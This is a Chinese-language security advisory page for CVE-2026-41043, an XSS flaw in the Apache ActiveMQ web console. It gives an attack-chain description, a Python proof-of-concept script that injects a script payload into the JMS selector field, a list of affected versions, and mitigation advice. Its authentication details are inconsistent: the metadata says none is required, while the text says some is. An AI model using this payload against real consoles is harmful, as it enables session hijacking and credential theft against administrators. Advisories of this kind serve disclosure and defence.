IPBUF安全漏洞报告
English
CVE-2026-41043 CVSS 6.5 中危

CVE-2026-41043 Apache ActiveMQ Web控制台XSS漏洞

披露日期: 2026-04-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41043
漏洞类型
XSS(跨站脚本攻击)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Apache ActiveMQ, Apache ActiveMQ Web

相关标签

XSSCross-Site ScriptingApache ActiveMQCVE-2026-41043Web SecurityMedium Severity

漏洞概述

Apache ActiveMQ及其Web控制台组件存在跨站脚本(XSS)漏洞。由于Web页面未能正确中和脚本相关的HTML标签,攻击者可以通过覆盖响应内容类型为HTML,并在JMS选择器字段中注入恶意代码。当用户浏览队列时,恶意内容将被渲染,导致攻击者可窃取凭据或执行恶意操作。

技术细节

该漏洞的根本原因在于Apache ActiveMQ Web控制台在处理用户输入时缺乏严格的HTML标签过滤机制。具体而言,攻击者利用JMS(Java消息服务)选择器字段作为注入点,构造包含恶意的JavaScript或HTML载荷的请求。关键利用步骤是修改HTTP请求头,将响应的Content-Type强制设置为text/html,从而绕过浏览器的安全机制并欺骗浏览器渲染注入的代码。尽管该漏洞通常需要一定的认证上下文(如访问Web控制台),但一旦成功,当管理员或其他用户浏览受影响的队列列表时,注入的脚本将在其浏览器环境中执行。这可能导致会话劫持、敏感信息泄露或进一步的客户端攻击,严重威胁消息中间件的管理安全。

攻击链分析

STEP 1
步骤1:侦察与发现
攻击者识别出目标使用的是存在漏洞的Apache ActiveMQ版本,并确认Web控制台可访问。
STEP 2
步骤2:构造恶意载荷
攻击者编写包含JavaScript代码的恶意HTML字符串,准备将其注入到JMS选择器字段中。
STEP 3
步骤3:篡改请求头
攻击者发送HTTP请求,将Content-Type头修改为text/html,迫使浏览器将响应作为HTML解析。
STEP 4
步骤4:注入与触发
攻击者将载荷注入JMS选择器参数。当管理员或用户浏览受影响的队列时,恶意脚本在浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://localhost:8161/admin/queues.jsp" # Malicious Payload to be injected into the JMS selector field xss_payload = "<script>alert('CVE-2026-41043 XSS');</script>" # Headers to override the content type headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "text/html", # Overriding content type to trigger HTML rendering "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" } # Data payload targeting the JMS selector parameter # Note: The actual parameter name might vary depending on the specific endpoint implementation data = { "JMSSelector": xss_payload, "view": "queues" } # Sending the request try: response = requests.post(target_url, headers=headers, data=data, verify=False) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the browser console or queue page for the alert.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Apache ActiveMQ < 5.19.6
Apache ActiveMQ >= 6.0.0, < 6.2.5
Apache ActiveMQ Web < 5.19.6
Apache ActiveMQ Web >= 6.0.0, < 6.2.5

防御指南

临时缓解措施
如果无法立即升级,建议通过网络访问控制列表(ACL)限制对ActiveMQ Web控制台端口(默认为8161)的访问,确保只有内部管理员能够连接。同时,管理员应避免点击不明链接或在浏览队列时执行敏感操作,直到补丁应用完毕。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表